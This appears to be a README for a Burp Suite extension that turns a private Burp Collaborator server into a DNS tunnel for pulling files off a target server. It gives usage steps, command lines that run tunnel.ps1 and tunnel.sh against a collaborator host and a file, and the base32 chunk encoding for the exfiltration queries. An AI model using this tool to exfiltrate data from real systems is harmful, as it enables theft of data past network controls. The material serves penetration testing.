Awesome
BurpCollaboratorDNSTunnel
A DNS tunnel utilizing the Burp Collaborator.
This extension sets up a private Burp Collaborator server as a DNS tunnel. One of the provided scripts will be used to exfiltrate data from a server through the DNS tunnel, displaying the tunneled data in Burp Suite.
Interactive usage with scripts
Multiple scripts exist for exfiltrating data from different environments. The scripts will be set up on the box to exfiltrate data from and will connect to a Burp Suite instance on our local box.
[B] Burp Suite
[S] Script
- [B] Click "Start listening"
- [B] Copy the printed location of the Burp Collaborator server
- [S] Run the script
- [S] Enter the Burp Collaborator address from (2) when prompted
- [S] Paste file name to be tunneled when prompted
- [B] After tunneling is completed click "Poll now"
Non-interactive usage with scripts
The scripts don't require user interaction if all the necessary information is provided as arguments.
[B] Burp Suite
[S] Script
- [B] Click "Start listening"
- [B] Copy the printed location of the Burp Collaborator server
- [S] Run the script
- Windows:
./tunnel.ps1 abc123.private-burp.com .\test.txt
- Linux:
./tunnel.sh -d abc123.private-burp.com -f test.txt
- Windows:
- [B] After tunneling is completed click "Poll now"
Usage between 2 Burp Suite instances
[R] Receiving Burp instance
[S] Sending Burp instance
- [R] Click "Start listening"
- [R] Copy the printed location of the Burp Collaborator server
- [S] Enter the address from (2) in the "Burp Collaborator Address" text box
- [S] Paste data to be tunneled in the "Data to tunnel" text box
- [S] Click "Tunnel Data"
- [R] After tunneling is completed click "Poll now"
Check the "Verbose" box for debugging information to see any errors in sending/receiving data.
Contributing
It would be nice to have more compact versions of the scripts for instances where you have to hand-type the scripts into the environment. If you would like to modify or add a script follow the basic protocol below:
1) Tunneling Data
[dnsFlag].[chunk].[chunkNumber].[burpcollaborator] #eg: nspi.JZSXIU2QJEQGS4ZAMF3WK43PNVSSC.0.fdwkpqtwvgxpk4toz2yduzx75ybozd.private-burp-collaborator.net
[dnsFlag] All data being tunneled needs to start with the 'nspi' subdomain, this is a flag for the tunnel to identify traffic
[chunk] Will be a 63-character base32-encoded chunk of data, removing any padding '='
[chunkNumber] Is the index of the current chunk in the overall tunneled data
[burpcollaborator] Is the full address of the private Burp Collaborator server
2) Notifying size of data sent
[dnsFlag].[amountFlag].[totalChunkCount].[burpcollaborator] #eg: nspi.amount.1.fdwkpqtwvgxpk4toz2yduzx75ybozd.private-burp-collaborator.net
[dnsFlag] All data being tunneled needs to start with the 'nspi' subdomain, this is a flag for the tunnel to identify traffic
[amountFlag] This subdomain's value will be 'amount' so the tunnel can identify this is as the request declaring the amount of data sent
[totalChunkCount] The total number of chunks sent through the tunnel, excluding this request
[burpcollaborator] Is the full address of the private Burp Collaborator server
Example
An example is below (click to enlarge). The example is using one Burp Suite instance and a Kali Linux box. <a href="https://github.com/NetSPI/BurpCollaboratorDNSTunnel/blob/master/images/bashDemo.gif?raw=true" target="_blank"><img src="./images/bashDemo.gif"/></a>